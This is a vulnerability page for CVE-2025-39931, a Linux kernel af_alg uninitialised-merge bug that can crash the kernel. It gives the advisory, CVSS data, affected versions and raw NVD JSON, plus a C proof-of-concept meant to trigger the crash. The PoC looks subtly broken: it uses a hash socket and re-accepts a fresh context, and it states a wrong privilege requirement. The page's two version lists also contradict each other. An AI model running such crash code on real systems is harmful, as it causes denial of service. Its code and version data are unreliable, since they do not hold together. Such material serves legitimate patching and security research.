Security Vulnerability Report
CVE-2025-39931 CVSS 5.5 MEDIUM

CVE-2025-39931

Published: 2025-10-04 08:15:46
Last Modified: 2026-05-12 13:17:18
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Set merge to zero early in af_alg_sendmsg If an error causes af_alg_sendmsg to abort, ctx->merge may contain a garbage value from the previous loop. This may then trigger a crash on the next entry into af_alg_sendmsg when it attempts to do a merge that can't be done. Fix this by setting ctx->merge to zero near the start of the loop.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 2.6.38, before 6.1.154) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.6.108) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7, before 6.12.49) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13, before 6.16.9) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* (rc1 through rc6 listed in the record) - VULNERABLE
Linux Kernel < 5.10.245
Linux Kernel 5.15.x < 5.15.196
Linux Kernel 6.1.x < 6.1.153
Linux Kernel 6.6.x < 6.6.107
Linux Kernel 6.12.x < 6.12.48
Linux Kernel 6.16.x < 6.16.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/* CVE-2025-39931 PoC - Linux kernel af_alg uninitialized merge crash
 * This PoC demonstrates triggering a kernel crash via AF_ALG socket
 * by exploiting the uninitialized ctx->merge field in af_alg_sendmsg.
 *
 * Compile: gcc -o poc poc.c
 * Run: ./poc (requires CAP_NET_RAW or similar privilege for AF_ALG)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <linux/socket.h>

int main(int argc, char *argv[])
{
    int tfmfd, opfd;
    struct sockaddr_alg sa;
    char buf[4096];

    /* Step 1: Create AF_ALG socket */
    tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfmfd < 0) {
        perror("socket(AF_ALG)");
        return 1;
    }

    /* Step 2: Bind to a hash algorithm (e.g., SHA256) */
    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "hash");
    strcpy((char *)sa.salg_name, "sha256");
    if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(tfmfd);
        return 1;
    }

    /* Step 3: Accept to get operation fd */
    opfd = accept(tfmfd, NULL, NULL);
    if (opfd < 0) {
        perror("accept");
        close(tfmfd);
        return 1;
    }

    /* Step 4: Trigger error path in af_alg_sendmsg
     * Send data with flags that cause early abort, leaving ctx->merge
     * with garbage value from previous iteration.
     * MSG_MORE or specific message sizes can trigger this condition.
     */
    memset(buf, 'A', sizeof(buf));

    /* First send - may partially process and set merge state */
    if (send(opfd, buf, 1, MSG_MORE) < 0) {
        perror("send 1");
    }

    /* Trigger error condition (e.g., invalid operation) */
    /* Close and reopen to trigger re-entry with stale merge value */
    close(opfd);
    opfd = accept(tfmfd, NULL, NULL);
    if (opfd < 0) {
        perror("accept 2");
        close(tfmfd);
        return 1;
    }

    /* Second send - ctx->merge contains garbage, triggers crash */
    send(opfd, buf, sizeof(buf), 0);

    close(opfd);
    close(tfmfd);
    printf("PoC completed. Check dmesg for kernel crash.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/045ee26aa3920a47ec46d7fcb302420bf01fd753 (Patch)
https://git.kernel.org/stable/c/2374c11189ef704a3e4863646369f1b8e6a27d71 (Patch)
https://git.kernel.org/stable/c/24c1106504c625fabd3b7229611af617b4c27ac7 (Patch)
https://git.kernel.org/stable/c/6241b9e2809b12da9130894cf5beddf088dc1b8a (Patch)
https://git.kernel.org/stable/c/9574b2330dbd2b5459b74d3b5e9619d39299fc6f (Patch)
https://cert-portal.siemens.com/productcert/html/ssa-082556.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39931", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:45.827", "lastModified": "2026-05-12T13:17:17.753", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - Set merge to zero early in af_alg_sendmsg\n\nIf an error causes af_alg_sendmsg to abort, ctx->merge may contain\na garbage value from the previous loop. This may then trigger a\ncrash on the next entry into af_alg_sendmsg when it attempts to do\na merge that can't be done.\n\nFix this by setting ctx->merge to zero near the start of the loop."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.38", "versionEndExcluding": "6.1.154", "matchCriteriaId": "90C36693-745D-4EC3-A247-5887CAEA12C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.108", "matchCriteriaId": "A7E8EAEE-7731-4996-9578-696255D61EA2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.49", "matchCriteriaId": 
"CAA033E9-A2C5-4976-A83E-9804D8FB827F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/045ee26aa3920a47ec46d7fcb302420bf01fd753", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2374c11189ef704a3e4863646369f1b8e6a27d71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/24c1106504c625fabd3b7229611af617b4c27ac7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6241b9e2809b12da9130894cf5beddf088dc1b8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9574b2330dbd2b5459b74d3b5e9619d39299fc6f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": 
"0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}